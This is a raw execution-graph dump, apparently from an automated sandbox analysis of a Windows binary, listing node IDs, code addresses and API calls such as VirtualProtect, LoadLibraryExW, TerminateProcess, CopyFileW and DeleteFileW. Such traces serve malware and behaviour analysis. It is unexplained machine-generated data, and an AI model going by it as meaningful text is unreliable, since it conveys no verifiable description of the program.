                                                                                                                                                                                                      execution_graph 101472 479c06 101483 41d3be 101472->101483 101474 479c1c 101482 479c91 Mailbox 101474->101482 101565 401caa 49 API calls 101474->101565 101476 479c71 101479 479cc5 101476->101479 101566 44b171 48 API calls 101476->101566 101480 47a7ab Mailbox 101479->101480 101567 44cc5c 86 API calls 4 library calls 101479->101567 101492 413200 101482->101492 101484 41d3ca 101483->101484 101485 41d3dc 101483->101485 101568 40dcae 50 API calls Mailbox 101484->101568 101487 41d3e2 101485->101487 101488 41d40b 101485->101488 101569 41f4ea 101487->101569 101578 40dcae 50 API calls Mailbox 101488->101578 101491 41d3d4 101491->101474 101601 40bd30 101492->101601 101494 413267 101496 4132f8 101494->101496 101497 47907a 101494->101497 101555 413628 101494->101555 101674 41c36b 86 API calls 101496->101674 101709 44cc5c 86 API calls 4 library calls 101497->101709 101498 479072 101498->101479 101502 413313 101551 4134eb Mailbox ___crtGetEnvironmentStringsW 101502->101551 101502->101555 101559 4794df 101502->101559 101606 402b7a 101502->101606 101503 4791fa 101724 44cc5c 86 API calls 4 library calls 101503->101724 101507 47909a 101507->101503 101710 40d645 101507->101710 101508 4793c5 101510 40fe30 346 API calls 101508->101510 101509 47926d 101728 44cc5c 86 API calls 4 library calls 101509->101728 101513 479407 101510->101513 101513->101555 101733 40d6e9 101513->101733 101516 479114 101529 479128 101516->101529 101539 479152 101516->101539 101517 479220 101725 401caa 49 API calls 101517->101725 101519 4133ce 101523 413465 101519->101523 101524 47945e 101519->101524 101519->101551 101531 41f4ea 48 API calls 101523->101531 101738 44c942 50 API calls 101524->101738 101526 479438 101737 44cc5c 86 API calls 4 library calls 101526->101737 101527 47923d 101532 479252 101527->101532 101533 47925e 101527->101533 101720 44cc5c 86 API calls 4 library calls 101529->101720 101542 41346c 101531->101542 101726 44cc5c 86 API calls 4 library calls 101532->101726 101727 44cc5c 86 API calls 4 library calls 101533->101727 101535 41c3c3 48 API calls 101535->101551 101540 479177 101539->101540 101544 479195 101539->101544 101721 45f320 346 API calls 101540->101721 101549 41351f 101542->101549 101613 40e8d0 101542->101613 101545 47918b 101544->101545 101722 45f5ee 346 API calls 101544->101722 101545->101555 101723 41c2d6 48 API calls ___crtGetEnvironmentStringsW 101545->101723 101547 41f4ea 48 API calls 101547->101551 101553 413540 101549->101553 101739 406eed 101549->101739 101551->101507 101551->101508 101551->101509 101551->101526 101551->101535 101551->101547 101551->101549 101554 479394 101551->101554 101551->101555 101676 40d9a0 53 API calls __cinit 101551->101676 101677 40d8c0 53 API calls 101551->101677 101678 41c2d6 48 API calls ___crtGetEnvironmentStringsW 101551->101678 101679 40fe30 101551->101679 101729 45cda2 82 API calls Mailbox 101551->101729 101730 4480e3 53 API calls 101551->101730 101731 40d764 55 API calls 101551->101731 101732 40dcae 50 API calls Mailbox 101551->101732 101553->101555 101558 4794b0 101553->101558 101561 413585 101553->101561 101557 41f4ea 48 API calls 101554->101557 101564 413635 Mailbox 101555->101564 101708 44cc5c 86 API calls 4 library calls 101555->101708 101557->101508 101743 40dcae 50 API calls Mailbox 101558->101743 101559->101555 101744 44cc5c 86 API calls 4 library calls 101559->101744 101561->101555 101561->101559 101562 413615 101561->101562 101675 40dcae 50 API calls Mailbox 101562->101675 101564->101479 101565->101476 101566->101482 101567->101480 101568->101491 101571 41f4f2 __calloc_impl 101569->101571 101572 41f50c 101571->101572 101573 41f50e std::exception::exception 101571->101573 101579 42395c 101571->101579 101572->101491 101593 426805 RaiseException 101573->101593 101575 41f538 101594 42673b 47 API calls _free 101575->101594 101577 41f54a 101577->101491 101578->101491 101580 4239d7 __calloc_impl 101579->101580 101585 423968 __calloc_impl 101579->101585 101600 427c0e 47 API calls __getptd_noexit 101580->101600 101583 42399b RtlAllocateHeap 101584 4239cf 101583->101584 101583->101585 101584->101571 101585->101583 101587 4239c3 101585->101587 101588 423973 101585->101588 101591 4239c1 101585->101591 101598 427c0e 47 API calls __getptd_noexit 101587->101598 101588->101585 101595 4281c2 47 API calls __NMSG_WRITE 101588->101595 101596 42821f 47 API calls 5 library calls 101588->101596 101597 421145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101588->101597 101599 427c0e 47 API calls __getptd_noexit 101591->101599 101593->101575 101594->101577 101595->101588 101596->101588 101598->101591 101599->101584 101600->101584 101602 40bd3f 101601->101602 101605 40bd5a 101601->101605 101745 40bdfa 101602->101745 101604 40bd47 CharUpperBuffW 101604->101605 101605->101494 101607 402b8b 101606->101607 101608 47436a 101606->101608 101609 41f4ea 48 API calls 101607->101609 101610 402b92 101609->101610 101611 402bb3 101610->101611 101762 402bce 48 API calls 101610->101762 101611->101519 101614 40e8f6 101613->101614 101673 40e906 Mailbox 101613->101673 101615 40ed52 101614->101615 101614->101673 101862 41e3cd 346 API calls 101615->101862 101616 44cc5c 86 API calls 101616->101673 101618 40ebdd 101618->101551 101620 40ed63 101620->101618 101622 40ed70 101620->101622 101621 40e94c PeekMessageW 101621->101673 101864 41e312 346 API calls Mailbox 101622->101864 101624 47526e Sleep 101624->101673 101625 40ed77 LockWindowUpdate DestroyWindow GetMessageW 101625->101618 101626 40eda9 101625->101626 101629 4759ef TranslateMessage DispatchMessageW GetMessageW 101626->101629 101627 40ebc7 101627->101618 101863 402ff6 16 API calls 101627->101863 101629->101629 101633 475a1f 101629->101633 101631 40ed21 PeekMessageW 101631->101673 101632 401caa 49 API calls 101632->101673 101633->101618 101634 40ebf7 timeGetTime 101634->101673 101636 41f4ea 48 API calls 101636->101673 101637 406eed 48 API calls 101637->101673 101638 40ed3a TranslateMessage DispatchMessageW 101638->101631 101639 475557 WaitForSingleObject 101640 475574 GetExitCodeProcess CloseHandle 101639->101640 101639->101673 101640->101673 101642 402aae 322 API calls 101642->101673 101643 47588f Sleep 101666 475429 Mailbox 101643->101666 101644 40edae timeGetTime 101865 401caa 49 API calls 101644->101865 101647 475733 Sleep 101647->101666 101650 41dc38 timeGetTime 101650->101666 101651 475926 GetExitCodeProcess 101652 475952 CloseHandle 101651->101652 101653 47593c WaitForSingleObject 101651->101653 101652->101666 101653->101652 101653->101673 101654 475445 Sleep 101654->101673 101655 475432 Sleep 101655->101654 101656 468c4b 108 API calls 101656->101666 101657 402c79 107 API calls 101657->101666 101659 4759ae Sleep 101659->101673 101664 40d6e9 55 API calls 101664->101666 101665 40fe30 322 API calls 101665->101673 101666->101650 101666->101651 101666->101654 101666->101655 101666->101656 101666->101657 101666->101659 101666->101664 101666->101673 101867 40d7f7 101666->101867 101872 444cbe 49 API calls Mailbox 101666->101872 101873 401caa 49 API calls 101666->101873 101874 40ce19 101666->101874 101880 402aae 346 API calls 101666->101880 101881 45ccb2 50 API calls 101666->101881 101882 447a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101666->101882 101883 446532 63 API calls 3 library calls 101666->101883 101669 413200 322 API calls 101669->101673 101671 40ce19 48 API calls 101671->101673 101672 40d6e9 55 API calls 101672->101673 101673->101616 101673->101621 101673->101624 101673->101627 101673->101631 101673->101632 101673->101634 101673->101636 101673->101637 101673->101638 101673->101639 101673->101642 101673->101643 101673->101644 101673->101647 101673->101654 101673->101665 101673->101666 101673->101669 101673->101671 101673->101672 101763 40ef00 101673->101763 101768 40f110 101673->101768 101833 4145e0 101673->101833 101851 41e244 101673->101851 101856 41dc5f 101673->101856 101861 40eed0 346 API calls Mailbox 101673->101861 101866 468d23 48 API calls 101673->101866 101674->101502 101675->101555 101676->101551 101677->101551 101678->101551 101680 40fe50 101679->101680 101706 40fe7e 101679->101706 101682 41f4ea 48 API calls 101680->101682 101681 420f0a 52 API calls __cinit 101681->101706 101682->101706 101683 41146e 101684 406eed 48 API calls 101683->101684 101701 40ffe1 101684->101701 101685 4397ed InterlockedDecrement 101685->101706 101686 41f4ea 48 API calls 101686->101706 101687 40d7f7 48 API calls 101687->101706 101688 410509 102854 44cc5c 86 API calls 4 library calls 101688->102854 101692 47a922 101692->101551 101693 411473 102853 44cc5c 86 API calls 4 library calls 101693->102853 101694 47a246 101698 406eed 48 API calls 101694->101698 101696 406eed 48 API calls 101696->101706 101698->101701 101699 47a873 101699->101551 101700 47a30e 101700->101701 102851 4397ed InterlockedDecrement 101700->102851 101701->101551 101703 47a973 102855 44cc5c 86 API calls 4 library calls 101703->102855 101705 47a982 101706->101681 101706->101683 101706->101685 101706->101686 101706->101687 101706->101688 101706->101693 101706->101694 101706->101696 101706->101700 101706->101701 101706->101703 101707 4115b5 101706->101707 102849 411820 346 API calls 2 library calls 101706->102849 102850 411d10 59 API calls Mailbox 101706->102850 102852 44cc5c 86 API calls 4 library calls 101707->102852 101708->101498 101709->101502 101711 40d654 101710->101711 101719 40d67e 101710->101719 101712 40d65b 101711->101712 101716 40d6c2 101711->101716 101713 40d6ab 101712->101713 101714 40d666 101712->101714 101713->101719 102857 41dce0 53 API calls 101713->102857 102856 40d9a0 53 API calls __cinit 101714->102856 101716->101713 102858 41dce0 53 API calls 101716->102858 101719->101516 101719->101517 101720->101555 101721->101545 101722->101545 101723->101503 101724->101555 101725->101527 101726->101555 101727->101555 101728->101555 101729->101551 101730->101551 101731->101551 101732->101551 101734 40d6f4 101733->101734 101736 40d71b 101734->101736 102859 40d764 55 API calls 101734->102859 101736->101526 101737->101555 101738->101549 101740 406f00 101739->101740 101741 406ef8 101739->101741 101740->101553 102860 40dd47 48 API calls ___crtGetEnvironmentStringsW 101741->102860 101743->101559 101744->101555 101746 40be0d 101745->101746 101750 40be0a ___crtGetEnvironmentStringsW 101745->101750 101747 41f4ea 48 API calls 101746->101747 101748 40be17 101747->101748 101751 41ee75 101748->101751 101750->101604 101753 41f4ea __calloc_impl 101751->101753 101752 42395c __crtGetStringTypeA_stat 47 API calls 101752->101753 101753->101752 101754 41f50c 101753->101754 101755 41f50e std::exception::exception 101753->101755 101754->101750 101760 426805 RaiseException 101755->101760 101757 41f538 101761 42673b 47 API calls _free 101757->101761 101759 41f54a 101759->101750 101760->101757 101761->101759 101762->101611 101764 40ef1d 101763->101764 101765 40ef2f 101763->101765 101764->101673 101884 44cc5c 86 API calls 4 library calls 101765->101884 101767 4786f9 101767->101767 101769 40f130 101768->101769 101770 40fe30 346 API calls 101769->101770 101774 40f199 101769->101774 101772 478728 101770->101772 101771 40f595 101778 40d7f7 48 API calls 101771->101778 101786 40f431 Mailbox 101771->101786 101772->101774 101902 44cc5c 86 API calls 4 library calls 101772->101902 101773 4787c8 101905 44cc5c 86 API calls 4 library calls 101773->101905 101774->101771 101780 40d7f7 48 API calls 101774->101780 101815 40f229 101774->101815 101821 40f3dd 101774->101821 101775 40f418 101783 478b1b 101775->101783 101775->101786 101816 40f6aa 101775->101816 101779 4787a3 101778->101779 101904 420f0a 52 API calls __cinit 101779->101904 101784 478772 101780->101784 101782 40f3f2 101782->101775 101906 449af1 48 API calls 101782->101906 101797 478bcf 101783->101797 101798 478b2c 101783->101798 101903 420f0a 52 API calls __cinit 101784->101903 101785 40d6e9 55 API calls 101785->101786 101786->101785 101790 478b7e 101786->101790 101793 478c53 101786->101793 101796 44cc5c 86 API calls 101786->101796 101799 478beb 101786->101799 101801 40fe30 346 API calls 101786->101801 101807 40f537 Mailbox 101786->101807 101811 411b90 48 API calls 101786->101811 101813 40fce0 101786->101813 101901 40dd47 48 API calls ___crtGetEnvironmentStringsW 101786->101901 101913 4397ed InterlockedDecrement 101786->101913 101921 41c1af 48 API calls 101786->101921 101788 40f770 101791 478a45 101788->101791 101792 40f77a 101788->101792 101915 45e40a 346 API calls Mailbox 101790->101915 101912 41c1af 48 API calls 101791->101912 101885 411b90 101792->101885 101920 44cc5c 86 API calls 4 library calls 101793->101920 101794 478810 101907 45eef8 346 API calls 101794->101907 101795 40fe30 346 API calls 101795->101816 101796->101786 101917 44cc5c 86 API calls 4 library calls 101797->101917 101914 45f5ee 346 API calls 101798->101914 101918 45bdbd 346 API calls Mailbox 101799->101918 101801->101786 101807->101673 101811->101786 101812 478c00 101812->101807 101919 44cc5c 86 API calls 4 library calls 101812->101919 101813->101807 101916 44cc5c 86 API calls 4 library calls 101813->101916 101815->101771 101815->101775 101815->101786 101815->101821 101816->101786 101816->101788 101816->101795 101816->101807 101816->101813 101819 47884b 101908 45ccdc 48 API calls 101819->101908 101820 478823 101820->101775 101820->101819 101821->101773 101821->101782 101821->101786 101823 478857 101825 478865 101823->101825 101826 4788aa 101823->101826 101909 449b72 48 API calls 101825->101909 101829 4788a0 Mailbox 101826->101829 101910 44a69d 48 API calls 101826->101910 101827 40fe30 346 API calls 101827->101807 101829->101827 101831 4788e7 101911 40bc74 48 API calls 101831->101911 101834 414637 101833->101834 101835 41479f 101833->101835 101836 476e05 101834->101836 101837 414643 101834->101837 101838 40ce19 48 API calls 101835->101838 101995 45e822 346 API calls Mailbox 101836->101995 101924 414300 101837->101924 101845 4146e4 Mailbox 101838->101845 101841 476e11 101842 414739 Mailbox 101841->101842 101996 44cc5c 86 API calls 4 library calls 101841->101996 101842->101673 101844 414659 101844->101841 101844->101842 101844->101845 101939 446524 101845->101939 101942 460d1d 101845->101942 101945 460d09 101845->101945 101948 44fa0c 101845->101948 101989 404252 101845->101989 101853 47df42 101851->101853 101855 41e253 101851->101855 101852 47df77 101853->101852 101854 47df59 TranslateAcceleratorW 101853->101854 101854->101855 101855->101673 101857 41dca3 101856->101857 101858 41dc71 101856->101858 101857->101673 101858->101857 101859 41dc96 IsDialogMessageW 101858->101859 101860 47dd1d GetClassLongW 101858->101860 101859->101857 101859->101858 101860->101858 101860->101859 101861->101673 101862->101627 101863->101620 101864->101625 101865->101673 101866->101673 101868 41f4ea 48 API calls 101867->101868 101869 40d818 101868->101869 101870 41f4ea 48 API calls 101869->101870 101871 40d826 101870->101871 101871->101666 101872->101666 101873->101666 101875 40ce28 __NMSG_WRITE 101874->101875 101876 41ee75 48 API calls 101875->101876 101877 40ce50 ___crtGetEnvironmentStringsW 101876->101877 101878 41f4ea 48 API calls 101877->101878 101879 40ce66 101878->101879 101879->101666 101880->101666 101881->101666 101882->101666 101883->101666 101884->101767 101886 411cf6 101885->101886 101888 411ba2 101885->101888 101886->101786 101887 411bae 101895 411bb9 101887->101895 101923 41c15c 48 API calls 101887->101923 101888->101887 101890 41f4ea 48 API calls 101888->101890 101891 4749c4 101890->101891 101893 41f4ea 48 API calls 101891->101893 101892 411c5d 101892->101786 101900 4749cf 101893->101900 101894 41f4ea 48 API calls 101896 411c9f 101894->101896 101895->101892 101895->101894 101897 411cb2 101896->101897 101922 402925 48 API calls 101896->101922 101897->101786 101899 41f4ea 48 API calls 101899->101900 101900->101887 101900->101899 101901->101786 101902->101774 101903->101815 101904->101786 101905->101807 101906->101794 101907->101820 101908->101823 101909->101829 101910->101831 101911->101829 101912->101786 101913->101786 101914->101786 101915->101813 101916->101807 101917->101807 101918->101812 101919->101807 101920->101807 101921->101786 101922->101897 101923->101895 101925 476e60 101924->101925 101928 41432c 101924->101928 101998 44cc5c 86 API calls 4 library calls 101925->101998 101927 476e71 101999 44cc5c 86 API calls 4 library calls 101927->101999 101928->101927 101935 414366 ___crtGetEnvironmentStringsW 101928->101935 101931 41f4ea 48 API calls 101931->101935 101932 4144b1 101932->101844 101933 40fe30 346 API calls 101933->101935 101934 414445 101934->101844 101935->101931 101935->101933 101935->101934 101936 414435 101935->101936 101937 476ebd 101935->101937 101936->101934 101997 45cda2 82 API calls Mailbox 101936->101997 102000 44cc5c 86 API calls 4 library calls 101937->102000 102001 446ca9 GetFileAttributesW 101939->102001 102005 45f8ae 101942->102005 101944 460d2d 101944->101842 101946 45f8ae 129 API calls 101945->101946 101947 460d19 101946->101947 101947->101842 101949 44fa1c __ftell_nolock 101948->101949 101950 44fa44 101949->101950 102218 40d286 48 API calls 101949->102218 101952 40936c 81 API calls 101950->101952 101954 44fa5e 101952->101954 101953 44fb92 101953->101842 101954->101953 101955 44fa80 101954->101955 101956 44fb68 101954->101956 101957 40936c 81 API calls 101955->101957 102130 4041a9 101956->102130 101964 44fa8c _wcscpy _wcschr 101957->101964 101960 44fb8e 101960->101953 101961 40936c 81 API calls 101960->101961 101963 44fbc7 101961->101963 101962 4041a9 136 API calls 101962->101960 102154 421dfc 101963->102154 101968 44fab0 _wcscat _wcscpy 101964->101968 101971 44fade _wcscat 101964->101971 101966 40936c 81 API calls 101967 44fafc _wcscpy 101966->101967 102219 4472cb GetFileAttributesW 101967->102219 101969 40936c 81 API calls 101968->101969 101969->101971 101971->101966 101972 44fb1c __NMSG_WRITE 101972->101953 101974 40936c 81 API calls 101972->101974 101973 44fbeb _wcscat _wcscpy 101977 40936c 81 API calls 101973->101977 101975 44fb48 101974->101975 102220 4460dd 77 API calls 4 library calls 101975->102220 101979 44fc82 101977->101979 101978 44fb5c 101978->101953 102157 44690b 101979->102157 101981 44fca2 101982 446524 3 API calls 101981->101982 101983 44fcb1 101982->101983 101984 40936c 81 API calls 101983->101984 101988 44fce2 101983->101988 101985 44fccb 101984->101985 102163 44bfa4 101985->102163 101987 404252 84 API calls 101987->101953 101988->101987 101990 404263 101989->101990 101991 40425c 101989->101991 101993 404272 101990->101993 101994 404283 FreeLibrary 101990->101994 101992 4235e4 __fcloseall 83 API calls 101991->101992 101992->101990 101993->101842 101994->101993 101995->101841 101996->101842 101997->101932 101998->101927 101999->101934 102000->101934 102002 446529 102001->102002 102003 446cc4 FindFirstFileW 102001->102003 102002->101842 102003->102002 102004 446cd9 FindClose 102003->102004 102004->102002 102041 40936c 102005->102041 102007 45f8ea 102014 45f92c Mailbox 102007->102014 102061 460567 102007->102061 102009 45fb8b 102010 45fcfa 102009->102010 102015 45fb95 102009->102015 102108 460688 89 API calls Mailbox 102010->102108 102013 45fd07 102013->102015 102016 45fd13 102013->102016 102014->101944 102074 45f70a 102015->102074 102016->102014 102017 40936c 81 API calls 102031 45f984 Mailbox 102017->102031 102022 45fbc9 102088 41ed18 102022->102088 102025 45fbe3 102094 44cc5c 86 API calls 4 library calls 102025->102094 102026 45fbfd 102095 41c050 102026->102095 102029 45fbee GetCurrentProcess TerminateProcess 102029->102026 102030 45fc14 102032 411b90 48 API calls 102030->102032 102040 45fc3e 102030->102040 102031->102009 102031->102014 102031->102017 102092 4629e8 48 API calls ___crtGetEnvironmentStringsW 102031->102092 102093 45fda5 60 API calls 2 library calls 102031->102093 102034 45fc2d 102032->102034 102033 45fd65 102033->102014 102037 45fd7e FreeLibrary 102033->102037 102106 46040f 105 API calls _free 102034->102106 102036 411b90 48 API calls 102036->102040 102037->102014 102040->102033 102040->102036 102107 40dcae 50 API calls Mailbox 102040->102107 102109 46040f 105 API calls _free 102040->102109 102042 409380 102041->102042 102043 409384 102041->102043 102042->102007 102044 474cbd __i64tow 102043->102044 102045 474bbf 102043->102045 102046 409398 102043->102046 102054 4093b0 __itow Mailbox _wcscpy 102043->102054 102047 474ca5 102045->102047 102048 474bc8 102045->102048 102110 42172b 80 API calls 4 library calls 102046->102110 102111 42172b 80 API calls 4 library calls 102047->102111 102053 474be7 102048->102053 102048->102054 102051 41f4ea 48 API calls 102052 4093ba 102051->102052 102052->102042 102056 40ce19 48 API calls 102052->102056 102055 41f4ea 48 API calls 102053->102055 102054->102051 102057 474c04 102055->102057 102056->102042 102058 41f4ea 48 API calls 102057->102058 102059 474c2a 102058->102059 102059->102042 102060 40ce19 48 API calls 102059->102060 102060->102042 102062 40bdfa 48 API calls 102061->102062 102063 460582 CharLowerBuffW 102062->102063 102112 441f11 102063->102112 102067 40d7f7 48 API calls 102068 4605bb 102067->102068 102119 4069e9 48 API calls ___crtGetEnvironmentStringsW 102068->102119 102070 46061a Mailbox 102070->102031 102071 4605d2 102120 40b18b 102071->102120 102073 4605de Mailbox 102073->102070 102124 45fda5 60 API calls 2 library calls 102073->102124 102075 45f77a 102074->102075 102076 45f725 102074->102076 102080 460828 102075->102080 102077 41f4ea 48 API calls 102076->102077 102079 45f747 102077->102079 102078 41f4ea 48 API calls 102078->102079 102079->102075 102079->102078 102081 460a53 Mailbox 102080->102081 102086 46084b _strcat _wcscpy __NMSG_WRITE 102080->102086 102081->102022 102082 40d286 48 API calls 102082->102086 102083 40cf93 58 API calls 102083->102086 102084 40936c 81 API calls 102084->102086 102085 42395c 47 API calls __crtGetStringTypeA_stat 102085->102086 102086->102081 102086->102082 102086->102083 102086->102084 102086->102085 102127 448035 50 API calls __NMSG_WRITE 102086->102127 102089 41ed2d 102088->102089 102090 41edc5 VirtualProtect 102089->102090 102091 41ed93 102089->102091 102090->102091 102091->102025 102091->102026 102092->102031 102093->102031 102094->102029 102096 41c064 102095->102096 102098 41c069 Mailbox 102095->102098 102128 41c1af 48 API calls 102096->102128 102104 41c077 102098->102104 102129 41c15c 48 API calls 102098->102129 102100 41f4ea 48 API calls 102101 41c108 102100->102101 102103 41f4ea 48 API calls 102101->102103 102102 41c152 102102->102030 102105 41c113 102103->102105 102104->102100 102104->102102 102105->102030 102105->102105 102106->102040 102107->102040 102108->102013 102109->102040 102110->102054 102111->102054 102113 441f3b __NMSG_WRITE 102112->102113 102114 441f79 102113->102114 102116 441f6f 102113->102116 102118 441ffa 102113->102118 102114->102067 102114->102073 102116->102114 102125 41d37a 60 API calls 102116->102125 102118->102114 102126 41d37a 60 API calls 102118->102126 102119->102071 102121 40b1a2 ___crtGetEnvironmentStringsW 102120->102121 102122 40b199 102120->102122 102121->102073 102122->102121 102123 40bdfa 48 API calls 102122->102123 102123->102121 102124->102070 102125->102116 102126->102118 102127->102086 102128->102098 102129->102104 102221 404214 102130->102221 102135 474f73 102137 404252 84 API calls 102135->102137 102136 4041d4 LoadLibraryExW 102231 404291 102136->102231 102140 474f7a 102137->102140 102142 404291 3 API calls 102140->102142 102144 474f82 102142->102144 102143 4041fb 102143->102144 102145 404207 102143->102145 102257 4044ed 102144->102257 102146 404252 84 API calls 102145->102146 102148 40420c 102146->102148 102148->101960 102148->101962 102151 474fa9 102265 404950 102151->102265 102490 421e46 102154->102490 102158 446918 _wcschr __ftell_nolock 102157->102158 102159 421dfc __wsplitpath 47 API calls 102158->102159 102162 44692e _wcscat _wcscpy 102158->102162 102160 44695d 102159->102160 102161 421dfc __wsplitpath 47 API calls 102160->102161 102161->102162 102162->101981 102164 44bfb1 __ftell_nolock 102163->102164 102165 41f4ea 48 API calls 102164->102165 102166 44c00e 102165->102166 102167 4047b7 48 API calls 102166->102167 102168 44c018 102167->102168 102169 44bdb4 GetSystemTimeAsFileTime 102168->102169 102170 44c023 102169->102170 102171 404517 83 API calls 102170->102171 102172 44c036 _wcscmp 102171->102172 102173 44c107 102172->102173 102174 44c05a 102172->102174 102175 44c56d 94 API calls 102173->102175 102546 44c56d 102174->102546 102189 44c0d3 _wcscat 102175->102189 102178 421dfc __wsplitpath 47 API calls 102183 44c088 _wcscat _wcscpy 102178->102183 102179 4044ed 64 API calls 102180 44c12c 102179->102180 102182 4044ed 64 API calls 102180->102182 102181 44c110 102181->101988 102184 44c13c 102182->102184 102186 421dfc __wsplitpath 47 API calls 102183->102186 102185 4044ed 64 API calls 102184->102185 102187 44c157 102185->102187 102186->102189 102188 4044ed 64 API calls 102187->102188 102190 44c167 102188->102190 102189->102179 102189->102181 102191 4044ed 64 API calls 102190->102191 102192 44c182 102191->102192 102193 4044ed 64 API calls 102192->102193 102194 44c192 102193->102194 102195 4044ed 64 API calls 102194->102195 102196 44c1a2 102195->102196 102197 4044ed 64 API calls 102196->102197 102198 44c1b2 102197->102198 102516 44c71a GetTempPathW GetTempFileNameW 102198->102516 102200 44c1be 102201 423499 117 API calls 102200->102201 102213 44c1cf 102201->102213 102202 44c289 102530 4235e4 102202->102530 102204 44c294 102206 44c2ae 102204->102206 102207 44c29a DeleteFileW 102204->102207 102205 4044ed 64 API calls 102205->102213 102208 44c342 CopyFileW 102206->102208 102212 44c2b8 102206->102212 102207->102181 102209 44c358 DeleteFileW 102208->102209 102210 44c36a DeleteFileW 102208->102210 102209->102181 102543 44c6d9 CreateFileW 102210->102543 102552 44b965 102212->102552 102213->102181 102213->102202 102213->102205 102517 422aae 102213->102517 102217 44c331 DeleteFileW 102217->102181 102218->101950 102219->101972 102220->101978 102270 404339 102221->102270 102224 40423c 102225 404244 FreeLibrary 102224->102225 102226 4041bb 102224->102226 102225->102226 102228 423499 102226->102228 102278 4234ae 102228->102278 102230 4041c8 102230->102135 102230->102136 102401 4042e4 102231->102401 102234 4042b8 102235 4042c1 FreeLibrary 102234->102235 102236 4041ec 102234->102236 102235->102236 102238 404380 102236->102238 102239 41f4ea 48 API calls 102238->102239 102240 404395 102239->102240 102409 4047b7 102240->102409 102242 4043a1 ___crtGetEnvironmentStringsW 102243 4043dc 102242->102243 102245 4044d1 102242->102245 102246 404499 102242->102246 102244 404950 57 API calls 102243->102244 102253 4043e5 102244->102253 102423 44c750 93 API calls 102245->102423 102412 40406b CreateStreamOnHGlobal 102246->102412 102249 4044ed 64 API calls 102249->102253 102251 404479 102251->102143 102252 474ed7 102254 404517 83 API calls 102252->102254 102253->102249 102253->102251 102253->102252 102418 404517 102253->102418 102255 474eeb 102254->102255 102256 4044ed 64 API calls 102255->102256 102256->102251 102258 474fc0 102257->102258 102259 4044ff 102257->102259 102447 42381e 102259->102447 102262 44bf5a 102467 44bdb4 102262->102467 102264 44bf70 102264->102151 102266 40495f 102265->102266 102269 475002 102265->102269 102472 423e65 102266->102472 102268 404967 102274 40434b 102270->102274 102273 404321 LoadLibraryA GetProcAddress 102273->102224 102275 40422f 102274->102275 102276 404354 LoadLibraryA 102274->102276 102275->102224 102275->102273 102276->102275 102277 404365 GetProcAddress 102276->102277 102277->102275 102281 4234ba _fseek 102278->102281 102279 4234cd 102326 427c0e 47 API calls __getptd_noexit 102279->102326 102281->102279 102283 4234fe 102281->102283 102282 4234d2 102327 426e10 8 API calls __wctomb_s_l 102282->102327 102297 42e4c8 102283->102297 102286 423503 102287 423519 102286->102287 102288 42350c 102286->102288 102289 423543 102287->102289 102290 423523 102287->102290 102328 427c0e 47 API calls __getptd_noexit 102288->102328 102311 42e5e0 102289->102311 102329 427c0e 47 API calls __getptd_noexit 102290->102329 102294 4234dd _fseek @_EH4_CallFilterFunc@8 102294->102230 102298 42e4d4 _fseek 102297->102298 102331 427cf4 102298->102331 102300 42e559 102367 4269d0 47 API calls __crtGetStringTypeA_stat 102300->102367 102303 42e5cc _fseek 102303->102286 102304 42e560 102306 42e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 102304->102306 102309 42e552 102304->102309 102305 42e4e2 102305->102300 102305->102309 102341 427d7c 102305->102341 102365 424e5b 48 API calls __lock 102305->102365 102366 424ec5 LeaveCriticalSection LeaveCriticalSection _doexit 102305->102366 102306->102309 102338 42e5d7 102309->102338 102312 42e600 __wopenfile 102311->102312 102313 42e61a 102312->102313 102325 42e7d5 102312->102325 102387 42185b 59 API calls 3 library calls 102312->102387 102385 427c0e 47 API calls __getptd_noexit 102313->102385 102315 42e61f 102386 426e10 8 API calls __wctomb_s_l 102315->102386 102317 42e838 102382 4363c9 102317->102382 102319 42354e 102330 423570 LeaveCriticalSection LeaveCriticalSection _fseek 102319->102330 102321 42e7ce 102321->102325 102388 42185b 59 API calls 3 library calls 102321->102388 102323 42e7ed 102323->102325 102389 42185b 59 API calls 3 library calls 102323->102389 102325->102313 102325->102317 102326->102282 102327->102294 102328->102294 102329->102294 102330->102294 102332 427d05 102331->102332 102333 427d18 EnterCriticalSection 102331->102333 102334 427d7c __mtinitlocknum 46 API calls 102332->102334 102333->102305 102335 427d0b 102334->102335 102335->102333 102368 42115b 47 API calls 3 library calls 102335->102368 102369 427e58 LeaveCriticalSection 102338->102369 102340 42e5de 102340->102303 102342 427d88 _fseek 102341->102342 102343 427d91 102342->102343 102344 427da9 102342->102344 102370 4281c2 47 API calls __NMSG_WRITE 102343->102370 102345 427da7 102344->102345 102352 427e11 _fseek 102344->102352 102345->102344 102373 4269d0 47 API calls __crtGetStringTypeA_stat 102345->102373 102348 427d96 102371 42821f 47 API calls 5 library calls 102348->102371 102350 427dbd 102353 427dd3 102350->102353 102354 427dc4 102350->102354 102351 427d9d 102372 421145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 102351->102372 102352->102305 102357 427cf4 __lock 46 API calls 102353->102357 102374 427c0e 47 API calls __getptd_noexit 102354->102374 102359 427dda 102357->102359 102358 427dc9 102358->102352 102360 427de9 InitializeCriticalSectionAndSpinCount 102359->102360 102361 427dfe 102359->102361 102363 427e04 102360->102363 102375 421c9d 102361->102375 102381 427e1a LeaveCriticalSection _doexit 102363->102381 102365->102305 102366->102305 102367->102304 102369->102340 102370->102348 102371->102351 102373->102350 102374->102358 102376 421ca6 RtlFreeHeap 102375->102376 102380 421ccf _free 102375->102380 102377 421cbb 102376->102377 102376->102380 102378 427c0e __set_osfhnd 45 API calls 102377->102378 102379 421cc1 GetLastError 102378->102379 102379->102380 102380->102363 102381->102352 102390 435bb1 102382->102390 102384 4363e2 102384->102319 102385->102315 102386->102319 102387->102321 102388->102323 102389->102325 102393 435bbd _fseek 102390->102393 102391 435bcf 102392 427c0e __set_osfhnd 47 API calls 102391->102392 102394 435bd4 102392->102394 102393->102391 102395 435c06 102393->102395 102396 426e10 __wctomb_s_l 8 API calls 102394->102396 102397 435c78 __wsopen_helper 110 API calls 102395->102397 102400 435bde _fseek 102396->102400 102398 435c23 102397->102398 102399 435c4c __wsopen_helper LeaveCriticalSection 102398->102399 102399->102400 102400->102384 102405 4042f6 102401->102405 102404 4042cc LoadLibraryA GetProcAddress 102404->102234 102406 4042aa 102405->102406 102407 4042ff LoadLibraryA 102405->102407 102406->102234 102406->102404 102407->102406 102408 404310 GetProcAddress 102407->102408 102408->102406 102410 41f4ea 48 API calls 